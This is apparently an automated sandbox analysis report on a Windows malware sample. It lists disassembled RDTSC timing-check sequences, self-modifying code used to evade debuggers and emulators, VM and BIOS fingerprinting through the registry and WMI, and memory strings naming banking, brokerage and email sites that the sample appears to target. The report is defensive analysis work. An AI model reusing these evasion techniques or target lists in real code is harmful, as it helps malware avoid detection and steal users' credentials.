Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60A8E second address: 4D50130 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b retn 0004h 0x0000000e nop 0x0000000f sub esp, 04h 0x00000012 xor ebx, ebx 0x00000014 cmp eax, 00000000h 0x00000017 je 00007F0E3850A4AAh 0x0000001d mov dword ptr [esp], 0000000Dh 0x00000024 call 00007F0E3C9F6609h 0x00000029 mov edi, edi 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50130 second address: 4D50134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50134 second address: 4D5013A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D5013A second address: 4D50169 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov si, 7D7Dh 0x0000000f mov ch, 74h 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E38E1CB1Bh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50169 second address: 4D5016F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D5016F second address: 4D501AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F0E38E1CB1Bh 0x00000015 sbb ah, FFFFFFCEh 0x00000018 jmp 00007F0E38E1CB29h 0x0000001d popfd 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D501AF second address: 4D501B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D501B4 second address: 4D501BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D501BA second address: 4D501BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D501BE second address: 4D501DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0E38E1CB20h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D5036B second address: 4D50377 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 mov cx, 54B9h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50377 second address: 4D503B9 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F0E38E1CB26h 0x00000008 add ch, FFFFFFC8h 0x0000000b jmp 00007F0E38E1CB1Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 sub edi, edi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F0E38E1CB21h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D503B9 second address: 4D503BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D503BF second address: 4D503C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D503C5 second address: 4D503C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D503C9 second address: 4D503CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D503CD second address: 4D50405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 inc ebx 0x00000009 pushad 0x0000000a jmp 00007F0E3850A34Ch 0x0000000f popad 0x00000010 test al, al 0x00000012 jmp 00007F0E3850A350h 0x00000017 je 00007F0E3850A4B9h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push ebx 0x00000021 pop ecx 0x00000022 movsx ebx, cx 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50475 second address: 4D504B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F0E38E1CB1Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E38E1CB1Eh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D504B2 second address: 4D504B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D504EF second address: 4D5052F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 6572h 0x00000007 push edi 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test eax, eax 0x0000000e jmp 00007F0E38E1CB25h 0x00000013 jg 00007F0EA9B2AA90h 0x00000019 pushad 0x0000001a push eax 0x0000001b mov cl, dh 0x0000001d pop ecx 0x0000001e mov edx, 2F78A7B8h 0x00000023 popad 0x00000024 js 00007F0E38E1CB5Ch 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D5052F second address: 4D50533 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50533 second address: 4D50539 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50539 second address: 4D50578 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-14h], edi 0x0000000c jmp 00007F0E3850A356h 0x00000011 jne 00007F0EA9218280h 0x00000017 pushad 0x00000018 movzx esi, di 0x0000001b movsx edx, ax 0x0000001e popad 0x0000001f mov ebx, dword ptr [ebp+08h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50578 second address: 4D5057C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D5057C second address: 4D50580 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50580 second address: 4D50586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50586 second address: 4D505BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A356h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-2Ch] 0x0000000c jmp 00007F0E3850A350h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movsx edx, si 0x00000018 pushad 0x00000019 popad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D505BD second address: 4D505DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB25h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D505DA second address: 4D50658 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, dx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushfd 0x00000008 jmp 00007F0E3850A355h 0x0000000d sub cx, 7286h 0x00000012 jmp 00007F0E3850A351h 0x00000017 popfd 0x00000018 popad 0x00000019 xchg eax, esi 0x0000001a jmp 00007F0E3850A34Eh 0x0000001f nop 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 call 00007F0E3850A34Dh 0x00000028 pop eax 0x00000029 pushfd 0x0000002a jmp 00007F0E3850A351h 0x0000002f sub ah, 00000046h 0x00000032 jmp 00007F0E3850A351h 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50658 second address: 4D50668 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB1Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50668 second address: 4D5066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D5066C second address: 4D506CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F0E38E1CB1Eh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F0E38E1CB1Dh 0x00000018 sbb cx, 7806h 0x0000001d jmp 00007F0E38E1CB21h 0x00000022 popfd 0x00000023 pushfd 0x00000024 jmp 00007F0E38E1CB20h 0x00000029 xor ah, FFFFFFA8h 0x0000002c jmp 00007F0E38E1CB1Bh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D506CD second address: 4D5073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F0E3850A34Fh 0x00000009 or esi, 1FF5FBEEh 0x0000000f jmp 00007F0E3850A359h 0x00000014 popfd 0x00000015 mov ecx, 7A3A0377h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F0E3850A34Fh 0x00000027 xor cl, FFFFFFFEh 0x0000002a jmp 00007F0E3850A359h 0x0000002f popfd 0x00000030 push eax 0x00000031 pop edx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D5073C second address: 4D50742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50742 second address: 4D50746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50746 second address: 4D5074A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50BE8 second address: 4D50BEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50BEC second address: 4D50BF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50CC9 second address: 4D50CD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50CD8 second address: 4D50D06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 4105C7F7h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0E38E1CB1Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50D06 second address: 4D50D30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 34A4D431h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0E3850A350h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50D30 second address: 4D50D36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50D36 second address: 4D50D66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A34Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call 00007F0EA920F170h 0x0000000e push 75A52B70h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov eax, dword ptr [esp+10h] 0x0000001e mov dword ptr [esp+10h], ebp 0x00000022 lea ebp, dword ptr [esp+10h] 0x00000026 sub esp, eax 0x00000028 push ebx 0x00000029 push esi 0x0000002a push edi 0x0000002b mov eax, dword ptr [75AB4538h] 0x00000030 xor dword ptr [ebp-04h], eax 0x00000033 xor eax, ebp 0x00000035 push eax 0x00000036 mov dword ptr [ebp-18h], esp 0x00000039 push dword ptr [ebp-08h] 0x0000003c mov eax, dword ptr [ebp-04h] 0x0000003f mov dword ptr [ebp-04h], FFFFFFFEh 0x00000046 mov dword ptr [ebp-08h], eax 0x00000049 lea eax, dword ptr [ebp-10h] 0x0000004c mov dword ptr fs:[00000000h], eax 0x00000052 ret 0x00000053 push eax 0x00000054 push edx 0x00000055 jmp 00007F0E3850A357h 0x0000005a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50D66 second address: 4D50D6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D50D6C second address: 4D50D70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60AEF second address: 4D60AF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60AF3 second address: 4D60AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60AF9 second address: 4D60B1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, di 0x00000006 mov bh, E0h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E38E1CB27h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60B1E second address: 4D60B6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E3850A359h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c jmp 00007F0E3850A353h 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0E3850A355h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60B6A second address: 4D60BD5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0E38E1CB21h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 jmp 00007F0E38E1CB1Ch 0x00000016 mov eax, 0710F2E1h 0x0000001b popad 0x0000001c mov esi, dword ptr [ebp+0Ch] 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 pushfd 0x00000023 jmp 00007F0E38E1CB28h 0x00000028 sbb si, 46A8h 0x0000002d jmp 00007F0E38E1CB1Bh 0x00000032 popfd 0x00000033 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60BD5 second address: 4D60BED instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx eax, dx 0x00000009 popad 0x0000000a test esi, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0E3850A34Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60BED second address: 4D60C85 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0E38E1CB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F0EA9B0A2D1h 0x0000000f jmp 00007F0E38E1CB26h 0x00000014 cmp dword ptr [75AB459Ch], 05h 0x0000001b pushad 0x0000001c mov ax, 1EBDh 0x00000020 pushfd 0x00000021 jmp 00007F0E38E1CB1Ah 0x00000026 or eax, 53ADEE98h 0x0000002c jmp 00007F0E38E1CB1Bh 0x00000031 popfd 0x00000032 popad 0x00000033 je 00007F0EA9B2236Bh 0x00000039 jmp 00007F0E38E1CB26h 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F0E38E1CB1Eh 0x00000046 adc si, 3028h 0x0000004b jmp 00007F0E38E1CB1Bh 0x00000050 popfd 0x00000051 push eax 0x00000052 push edx 0x00000053 movzx ecx, dx 0x00000056 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60C85 second address: 4D60CB7 instructions: 0x00000000 rdtsc 0x00000002 mov bh, D5h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jmp 00007F0E3850A34Dh 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0E3850A358h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60CB7 second address: 4D60CBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60CBB second address: 4D60CC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60CC1 second address: 4D60CD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E38E1CB1Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60CFE second address: 4D60D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0E3850A34Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	RDTSC instruction interceptor: First address: 4D60D99 second address: 4D60DAB instructions: 0x00000000 rdtsc 0x00000002 mov dl, ch 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 mov edi, 6E562F3Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 mov esi, edx 0x00000012 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Special instruction interceptor: First address: 888825 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Special instruction interceptor: First address: 888874 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Special instruction interceptor: First address: A35D6D instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Special instruction interceptor: First address: A3530B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Special instruction interceptor: First address: A3F4F1 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe TID: 6108	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Users\user\Desktop\IERiUft8Wi.exe TID: 3720	Thread sleep time: -30000s >= -30000s			Jump to behavior

Source: C:\Users\user\Desktop\IERiUft8Wi.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: IERiUft8Wi.exe, 00000000.00000002.1498883192.0000000000A17000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: IERiUft8Wi.exe, 00000000.00000003.1343856828.0000000000D4B000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499468644.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1450484970.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1498352789.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1419235825.0000000000D49000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000003.1467502633.0000000000D4C000.00000004.00000020.00020000.00000000.sdmp, IERiUft8Wi.exe, 00000000.00000002.1499314192.0000000000D17000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696492231p
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696492231f
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696492231
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: IERiUft8Wi.exe, 00000000.00000003.1369980268.00000000056C1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696492231x
